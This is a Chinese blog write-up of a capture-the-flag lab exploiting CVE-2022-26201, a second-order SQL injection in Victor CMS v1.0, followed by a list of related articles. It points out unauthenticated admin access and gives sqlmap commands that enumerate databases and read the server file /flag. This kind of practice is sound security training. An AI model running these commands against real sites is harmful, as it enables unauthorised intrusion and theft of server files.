CVE-2022-26201靶场WP

最新推荐文章于 2023-12-16 09:00:00 发布
最新推荐文章于 2023-12-16 09:00:00 发布
阅读量894 收藏 2
点赞数
分类专栏: 春秋云镜 文章标签: web安全 网络安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46029520/article/details/128102549
版权

【春秋云境】CVE-2022-26201靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • Victor CMS v1.0 存在二次注入漏洞
2.开启靶场

请添加图片描述

3.找到注入点

  • 在首页上面banner的admin,存在未授权访问,可以直接进入admin后台。点击categories,即可找到下图的注入点

    请添加图片描述

4.burpsuite抓包
  • 填写数据,并用BP抓包保存为1.txt
    请添加图片描述
5.sqlmap攻击

  • 爆库

    python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch --dbs

    请添加图片描述

  • 发现不存在flag或者ctf库。所以我们换个思路,尝试读取文件

    python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --file-read "/flag" --dbms Mysql

    自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag

    请添加图片描述

成功获得flag

果粒程1122
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Victor CMS SQL注入漏洞( CVE-2022-26201)
千寻的博客
12-01 1833
Victor CMS v1.0 存在二次注入漏洞
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云镜wp day1
xy404的博客
10-13 3599
今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷,比打CTF轻松多了。
春秋云境:CVE-2022-26201
一只爱吃橙子的羊
11-30 1144
Victor CMS v1.0 存在二次注入漏洞
CVE-2022-26201
龙狼刺的博客
06-18 194
Victor CMS v1.0 存在二次注入漏洞。
春秋云境:CVE-2022-26201(二次注入漏洞)
m0_65712192的博客
04-21 1236
Victor CMS v1.0 存在二次注入漏洞
Victor CMS 二次注入漏洞(CVE-2022-26201)
weixin_68999845的博客
08-17 830
1.下载源码到本地:https://codeload.github.com/VictorAlagwu/CMSsite/zip/refs/heads/master。源码下载url:https://codeload.github.com/VictorAlagwu/CMSsite/zip/refs/heads/master。语句接收$cat_title并未过滤,单引号、右括号闭合,即可插入sql注入语句,运用insert语句完成二次注入。·漏洞名称:Victor CMS 二次注入漏洞。目前最高版本:v1.0。
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞 0x10靶场环境 0x20目录结构 CVE-2021-22192 ├── README.md ............... [此 README 说明] ├── imgs .................... [辅助 README 说明的图片] ├── gitlab .................. [Gitlab 容器的挂载目录] │ ├── Dockerfile .......... [Gitlab 的 Docker 构建文件] │ ├── config .............. [Gitlab 配置挂载目录] │ ├── data ................ [Gitlab 数据挂载目录] │ ├── logs ................ [Gitlab 日
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
【春秋云镜】CVE-2022-26201 Victor CMS v1.0 存在二次注入漏洞 解题思路
最新发布
Dark-Specter的博客
12-16 1174
二次注入漏洞(Second-Order Injection Vulnerability)是一种安全漏洞,通常出现在Web应用程序中。它是基于用户输入的攻击,类似于常见的SQL注入漏洞,但与之不同的是,二次注入漏洞不是直接在用户提供的输入上发生,而是在稍后的某个阶段或请求中。:二次注入漏洞的原理在于,Web应用程序在某个阶段(通常是数据存储或处理阶段)没有充分地验证、过滤或转义用户输入,然后将该输入存储到数据库、文件或其他存储设备中。
春秋云镜 CVE-2022-26201/ CVE-2021-25203
qq_22002773的博客
07-22 234
春秋云镜 CVE-2022-26201/ CVE-2021-25203
[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag
qq_49199168的博客
10-30 2253
[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag
工控安全,纵横网络靶场部分WP(一)
Zhangyannn的博客
06-04 3208
纵横网络靶场部分 wp 前言 最近有了misc、二进制、web的一些基础后,准备开始工控安全的一些题目学习。目前做了几道靶场题目,发现主要题型还是和modbus等工控协议相关的流量分析、misc相关等,所以简单做一个记录,以便以后学习回顾。 黑客的大意 题目描述: 文件下载下来后得到的是一个没有格式的文档,所以我们先用winhex或者010看一下文件是什么格式的 可以看到,文件头显示mail文件是png格式的,所以我们修改后缀名,用png格式打开mail文件,得到如下的图片 可以看到得到的图片里面包含
春秋云镜 CVE-2022-26201
qq_22002773的博客
07-23 222
春秋云镜 CVE-2022-26201
网络安全靶场推荐,通过实操能快速提升实战技能!
Y525698136的博客
10-18 1759
自学网络安全知识,具备一定的理论基础,缺乏实战经验,想去网络靶场体验一下,通过实操能快速提升实战技能!
CVE-2022-26201-春秋云境.com-Victor CMS v1.0 存在二次注入漏洞
qq_42036164的博客
01-19 216
靶标介绍: Victor CMS v1.0 存在二次注入漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值